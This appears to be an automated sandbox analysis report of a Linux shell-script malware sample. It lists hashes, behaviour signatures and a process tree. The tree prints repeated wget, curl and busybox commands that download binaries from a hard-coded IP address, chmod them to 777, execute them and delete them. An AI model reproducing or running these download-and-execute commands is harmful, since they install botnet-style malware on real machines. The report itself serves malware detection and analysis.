Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:21
Static task
static1
Behavioral task
behavioral1
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh
-
Size
10KB
-
MD5
8695c3f5bc9a782d939a590ce31f75f3
-
SHA1
914e569c0a6610aac0f3009b5b8970f722aab8df
-
SHA256
2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e
-
SHA512
ca0e16c73a69de5d269bec40b6c389461cb0930553830b76e87bcd98c43bcc506fc81cdfedd919445aed23d40b6c0b45cc902815318deb69fa37f0909fd77b3b
-
SSDEEP
192:5P8Pu15ABxEJ3AUJMkxiq6tiZEuy15ABxGAUJMkxeq6tiZEL:5P8Pu15ABxEJ3AUJMkxnTy15ABxGAUJe
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 871 chmod 877 chmod 925 chmod 967 chmod 985 chmod 749 chmod 778 chmod 973 chmod 919 chmod 961 chmod 991 chmod 763 chmod 820 chmod 889 chmod 937 chmod 943 chmod 830 chmod 895 chmod 913 chmod 901 chmod 955 chmod 949 chmod 979 chmod 757 chmod 907 chmod 931 chmod 853 chmod 883 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 750 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 758 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 764 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 780 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 821 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 832 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 855 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 872 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 878 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 884 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 890 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 896 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 902 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 908 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd 914 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl 920 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh 926 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt 932 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 938 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh 944 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI 950 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH 956 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz 962 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN 968 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 974 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk 980 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM 986 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo 992 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9 curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh curl File opened for modification /tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh curl File opened for modification /tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl File opened for modification /tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11 curl File opened for modification /tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd curl File opened for modification /tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI curl File opened for modification /tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN curl File opened for modification /tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk curl File opened for modification /tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM curl File opened for modification /tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz curl
Processes
-
/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh/tmp/2c3e20875951ea008776d44baa8a3d95bfd87924982501915db7d3c1b6a6de8e.sh1⤵PID:720
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:746
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:756
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:762
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:775
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:782
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:796
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:827
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:849
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:870
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:876
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:882
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:888
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:894
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:900
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:906
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:912
-
-
/bin/chmodchmod 777 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd./0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 0mO2JvaNKgSOJbg0nz2aFiUbiuimKojMZd2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:918
-
-
/bin/chmodchmod 777 RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl./RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm RTl619B8aZZQ6WYjcm3u7dfF3NfWEC86Kl2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:924
-
-
/bin/chmodchmod 777 l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh./l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm l5Y0lm8Ivpqbd0g1PfTyAMmpbRNyGTLoRh2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:930
-
-
/bin/chmodchmod 777 tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt./tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm tcqctJh5XzOVPF9hC9JjwWPNCUwPCMYWwt2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:936
-
-
/bin/chmodchmod 777 yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj9./yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm yGceYYxfrwKJP5H5Jsn3Kqja1INTtU6Hj92⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:942
-
-
/bin/chmodchmod 777 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh./5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm 5ugwqWk7bVljkhdnqyow05nOG62MFu1EPh2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:948
-
-
/bin/chmodchmod 777 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI./9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵
- Executes dropped EXE
PID:950
-
-
